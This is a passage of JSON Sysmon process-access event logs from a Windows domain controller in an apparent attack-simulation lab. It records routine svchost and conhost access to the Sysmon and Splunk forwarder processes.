05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-001032880F00}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-001032880F00}","TargetProcessId":"3356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
